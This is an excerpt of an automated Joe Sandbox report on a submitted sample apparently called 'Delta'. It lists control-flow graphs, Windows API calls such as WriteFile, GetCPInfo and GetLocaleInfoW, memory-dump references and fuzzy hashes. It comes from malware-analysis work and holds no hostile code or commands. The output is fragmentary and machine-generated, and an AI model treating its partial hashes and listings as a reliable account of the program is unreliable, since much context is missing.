262->264 263->238 264->261 264->264
                                                                                          APIs
                                                                                            • Part of subcall function 005F74AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 005F74D8
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,005F76B8,?,00000000,?,?,?), ref: 005F7309
                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,005F76B8,?,00000000,?,?,?), ref: 005F7345
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: 51408780b7e817089f6efc504c6b42968bd4a06eed4514c4404090e15ec93b4a
                                                                                          • Instruction ID: 6629f47d462b7be7088d788979f714feebbd3b9eea447f5a78cf77c1fa16221c
                                                                                          • Opcode Fuzzy Hash: 51408780b7e817089f6efc504c6b42968bd4a06eed4514c4404090e15ec93b4a
                                                                                          • Instruction Fuzzy Hash: B7512A70A0824D5EDB20CF35C8456BBBFF5FF89300F18486ED6968B291E7789546DB90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 267 5fdb7d-5fdbd2 call 5ea050 270 5fdc47-5fdc57 call 5e71d1 267->270 271 5fdbd4 267->271 272 5fdbda 271->272 275 5fdbe0-5fdbe2 272->275 276 5fdbfc-5fdc21 WriteFile 275->276 277 5fdbe4-5fdbe9 275->277 280 5fdc3f-5fdc45 GetLastError 276->280 281 5fdc23-5fdc2e 276->281 278 5fdbeb-5fdbf1 277->278 279 5fdbf2-5fdbfa 277->279 278->279 279->275 279->276 280->270 281->270 282 5fdc30-5fdc3b 281->282 282->272 283 5fdc3d 282->283 283->270
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,005FD50F,?,005EDA94,?,?,?,00000000), ref: 005FDC19
                                                                                          • GetLastError.KERNEL32(?,005FD50F,?,005EDA94,?,?,?,00000000,?,?,?,?,?,005ED832,?,005EDA94), ref: 005FDC3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID:
                                                                                          • API String ID: 442123175-0
                                                                                          • Opcode ID: b484f76a0e24b07ea1baa9e4c13ed26ac12e202fe94e5e3dd6044f0c4fa7d2e2
                                                                                          • Instruction ID: 3ea377668d81a85710b0a02f960712f189f02a33397bf76e579be9c6e9d66137
                                                                                          • Opcode Fuzzy Hash: b484f76a0e24b07ea1baa9e4c13ed26ac12e202fe94e5e3dd6044f0c4fa7d2e2
                                                                                          • Instruction Fuzzy Hash: AD218230A002199FCB19CF29DC909E9BBBAFB89305F1441A9EA46D7251D6309E42CF64

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 284 5f7192-5f7197 285 5f7199-5f71b1 284->285 286 5f71bf-5f71c8 285->286 287 5f71b3-5f71b7 285->287 289 5f71da 286->289 290 5f71ca-5f71cd 286->290 287->286 288 5f71b9-5f71bd 287->288 291 5f7234-5f7238 288->291 294 5f71dc-5f71e9 GetStdHandle 289->294 292 5f71cf-5f71d4 290->292 293 5f71d6-5f71d8 290->293 291->285 295 5f723e-5f7241 291->295 292->294 293->294 296 5f71eb-5f71ed 294->296 297 5f7216-5f7228 294->297 296->297 299 5f71ef-5f71f8 GetFileType 296->299 297->291 298 5f722a-5f722d 297->298 298->291 299->297 300 5f71fa-5f7203 299->300 301 5f720b-5f720e 300->301 302 5f7205-5f7209 300->302 301->291 303 5f7210-5f7214 301->303 302->291 303->291
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,005F7081,0060FCD8,0000000C), ref: 005F71DE
                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,005F7081,0060FCD8,0000000C), ref: 005F71F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 6b8730be9d66508e4a6ba3f8957f6666d64f17198606e7d347a5aeba43bc9d63
                                                                                          • Instruction ID: bc792c7316f5e978855cae3c797fde15408b12d65cefb032fdc2cb76739fab56
                                                                                          • Opcode Fuzzy Hash: 6b8730be9d66508e4a6ba3f8957f6666d64f17198606e7d347a5aeba43bc9d63
                                                                                          • Instruction Fuzzy Hash: 4511E43510C74D4AC7308E3E8C88A367E96BB5A370B380B5AE6B6C65F1C738C94AC640

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 005E2038
                                                                                          • GetModuleFileNameW.KERNEL32 ref: 005E2058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$FileHandleName
                                                                                          • String ID:
                                                                                          • API String ID: 4146042529-0
                                                                                          • Opcode ID: 2b439373881acf2a08fb0d72fd886356a33f894e783ece5c00bab853b01513c6
                                                                                          • Instruction ID: f1269c891a9a296a5fe3f7d443bb2910c966811d345b54b5105135e44bbec206
                                                                                          • Opcode Fuzzy Hash: 2b439373881acf2a08fb0d72fd886356a33f894e783ece5c00bab853b01513c6
                                                                                          • Instruction Fuzzy Hash: CD01ECB09043198FDB15EF68D54969EBBF8BB48300F4188ADE499D3341EB745A88CF92

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 311 5f64f3-5f6502 call 5f6862 314 5f652b-5f6545 call 5f658f LCMapStringW 311->314 315 5f6504-5f6529 LCMapStringEx 311->315 319 5f654b-5f654d 314->319 315->319
                                                                                          APIs
                                                                                          • LCMapStringEx.KERNELBASE(?,005F6F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 005F6527
                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,005F6F1A,?,?,-00000008,?,00000000), ref: 005F6545
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID:
                                                                                          • API String ID: 2568140703-0
                                                                                          • Opcode ID: 400169143eee28142ae57086a46d5675d9ce69c30a8ac12601974819da7702fd
                                                                                          • Instruction ID: 240331bc49530b8d306d83253ee39ff955e3fe03c7ad0449ddaac6bae43d0f8a
                                                                                          • Opcode Fuzzy Hash: 400169143eee28142ae57086a46d5675d9ce69c30a8ac12601974819da7702fd
                                                                                          • Instruction Fuzzy Hash: 44F0683240011EBBCF126F90DC159EE3E66FB487A0F058910BA1825020CB36C971AB91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 320 5f56b7-5f56c0 321 5f56ef-5f56f0 320->321 322 5f56c2-5f56d5 RtlFreeHeap 320->322 322->321 323 5f56d7-5f56ee GetLastError call 5f135d call 5f1314 322->323 323->321
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,005F9A64,?,00000000,?,?,005F9704,?,00000007,?,?,005FA04A,?,?), ref: 005F56CD
                                                                                          • GetLastError.KERNEL32(?,?,005F9A64,?,00000000,?,?,005F9704,?,00000007,?,?,005FA04A,?,?), ref: 005F56D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 1fb1d60d6b79c85755134e4e8847a58be0d519c9008f3dea8d11503722d2a64a
                                                                                          • Instruction ID: 468f0d15ed82fadae144b17147f590c1eb0825d78de940f31af6c28235692b3d
                                                                                          • Opcode Fuzzy Hash: 1fb1d60d6b79c85755134e4e8847a58be0d519c9008f3dea8d11503722d2a64a
                                                                                          • Instruction Fuzzy Hash: 08E08632140A19ABDB112BA4EC0CBE97F99AB40752F145421F71CD60A0D7398850C7D8

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 328 5e14c0-5e152f call 5f3330 call 5e3070 333 5e1535-5e1555 call 5e3070 328->333 334 5e1560-5e156a 328->334 341 5e156f-5e1592 call 5e3070 333->341 342 5e155b 333->342 335 5e1597-5e15be call 5e3090 call 5e31a0 334->335 347 5e15c4-5e15cd 335->347 348 5e15d2-5e162c call 5e3370 call 5e31c0 call 5e33a0 call 5e3410 335->348 341->335 342->334 349 5e18b5-5e1903 call 5e35f0 call 5e3640 347->349 364 5e1632 348->364 365 5e16e1 348->365 366 5e1637-5e1643 364->366 367 5e16e6-5e16ef 365->367 368 5e16dc 366->368 369 5e1649-5e16b1 call 5e3450 call 5e3520 call 5e3470 call 5e3540 call 5e3430 366->369 370 5e1707-5e170c 367->370 371 5e16f5-5e1704 367->371 368->365 413 5e16bc-5e16c5 369->413 414 5e16b7-5e16d7 369->414 373 5e1717-5e175c call 5e3450 call 5e3550 call 5e3470 370->373 374 5e1712-5e17c0 370->374 371->370 400 5e1761-5e178d call 5e3540 call 5e3430 373->400 378 5e17c6 374->378 379 5e1891-5e18b0 call 5e35a0 374->379 382 5e17cb-5e17d7 378->382 379->349 393 5e1835-5e183c 379->393 386 5e188c 382->386 387 5e17dd-5e1820 call 5e3450 call 5e3520 call 5e3470 382->387 386->379 387->393 415 5e1841-5e1861 call 5e3540 call 5e3430 387->415 393->349 419 5e1798-5e179e 400->419 420 5e1793 400->420 413->368 414->366 425 5e186c-5e1875 415->425 426 5e1867-5e1887 415->426 422 5e17a1-5e17b7 419->422 420->422 422->367 425->386 426->382
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID:
                                                                                          • API String ID: 4218353326-0
                                                                                          • Opcode ID: 7a08b880120f1d7e7079c12e9e75b077eee1b7c76a24a6960d34250c1e55eea2
                                                                                          • Instruction ID: 2ae1d8bfd5b8bc6f7be0af579644f03ca622dc30c6e72551a0e47de8bfb02b65
                                                                                          • Opcode Fuzzy Hash: 7a08b880120f1d7e7079c12e9e75b077eee1b7c76a24a6960d34250c1e55eea2
                                                                                          • Instruction Fuzzy Hash: 9AD1F474604B808FC728DF3AC599A66BBE0BF48714B148A5DE8D78BBA1D734F904CB45
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000083,?,00000005,005F76B8,?), ref: 005F7869
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-0
                                                                                          • Opcode ID: 4f430072cffd7d3f11ed2d8bec239e4ecd61a5d46defa98f6c4311db05ddbdbf
                                                                                          • Instruction ID: b16f9f56e4ae8f74e2ee34313715499aa11605ab7ed3397ffd6882a8b06de520
                                                                                          • Opcode Fuzzy Hash: 4f430072cffd7d3f11ed2d8bec239e4ecd61a5d46defa98f6c4311db05ddbdbf
                                                                                          • Instruction Fuzzy Hash: 9E514BB190815DAEDB118A28CD84BF57FADFF19300F1401E9E689C7142D3799D85CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c730388a1834ed52e43c9843f872423a7e85f131ee7be7a0a64cb3a54a7a259
                                                                                          • Instruction ID: 54c6f3d9a143535422d2012eb84c21296ae98092b05e7b2f28d826243901d914
                                                                                          • Opcode Fuzzy Hash: 2c730388a1834ed52e43c9843f872423a7e85f131ee7be7a0a64cb3a54a7a259
                                                                                          • Instruction Fuzzy Hash: A741B171A0055AAFCF18DF6AC4509FDBBB9FF18310B14016AE589E7640EF31E945CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 61bc16c5d798e7780de47d88cad0a058f65130f60535376a5d14ac38c21899dd
                                                                                          • Instruction ID: 792f19518a91111265ccb65dc594350e2e938d60bd4a21d93bb47a2c0f228a8a
                                                                                          • Opcode Fuzzy Hash: 61bc16c5d798e7780de47d88cad0a058f65130f60535376a5d14ac38c21899dd
                                                                                          • Instruction Fuzzy Hash: 1801F53360121A9B9F069F68EC819663BA6FBC17287288625FA10CB094DB35AC508BD1
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,005F7675,?,?,005F7675,00000220,?,?,?), ref: 005F5723
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 5aa14442c031ee42f2b85f03ec354b9c1ea6d4e0bf5c010c8caa6292f1e2d41f
                                                                                          • Instruction ID: 738e8e46ba348783399e8efa08b6d069cf3e2e668a929c4a29adef570f94d1c9
                                                                                          • Opcode Fuzzy Hash: 5aa14442c031ee42f2b85f03ec354b9c1ea6d4e0bf5c010c8caa6292f1e2d41f
                                                                                          • Instruction Fuzzy Hash: A8E06D31642E6AD6DB217A659C05BBB3E88FF817F0F154521EF46961D0FBA8CC0186E4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: 64e4e47b91c4c3c0884d33d51aa3e3d25937893bba143e0d16188041f198cc8b
                                                                                          • Instruction ID: f470e2321a90990a5b9bc58bc9dca2f2394255ed43bd6051a24d98746dfad3d8
                                                                                          • Opcode Fuzzy Hash: 64e4e47b91c4c3c0884d33d51aa3e3d25937893bba143e0d16188041f198cc8b
                                                                                          • Instruction Fuzzy Hash: D2D23B71E482298FDB69CE28CD447EAB7B6FB45305F1441EAD40DE7280DB78AE858F41
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,005FAB6D,00000002,00000000,?,?,?,005FAB6D,?,00000000), ref: 005FB250
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,005FAB6D,00000002,00000000,?,?,?,005FAB6D,?,00000000), ref: 005FB279
                                                                                          • GetACP.KERNEL32(?,?,005FAB6D,?,00000000), ref: 005FB28E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 6ab39ea83970f68d5733eeb983c959d40a726d4de7b289851d6f3d49c2f59069
                                                                                          • Instruction ID: 29d41accbff5e616ba1b5f7359f61a04b025bc523f47ab2ff995b919c900db92
                                                                                          • Opcode Fuzzy Hash: 6ab39ea83970f68d5733eeb983c959d40a726d4de7b289851d6f3d49c2f59069
                                                                                          • Instruction Fuzzy Hash: 7021B32AA40108EAFB348F64C905BBF7FA7BF54B50B5A8524EB0AD7114E736DE40C350
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 005FAB3F
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 005FAB7D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 005FAB90
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005FABD8
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005FABF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: af274de219f071324e503e65c53518f00a2535b2b192f51324d9f8788631743b
                                                                                          • Instruction ID: 8d8ae415483fc26068bff05462d520e2e096a35592d55631747cdbcdbe5b44c7
                                                                                          • Opcode Fuzzy Hash: af274de219f071324e503e65c53518f00a2535b2b192f51324d9f8788631743b
                                                                                          • Instruction Fuzzy Hash: 24515FB1A0021EAFEB10DFA5CC45ABA7BB9BF44700F144469BA48E7191E7749D44CB63
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
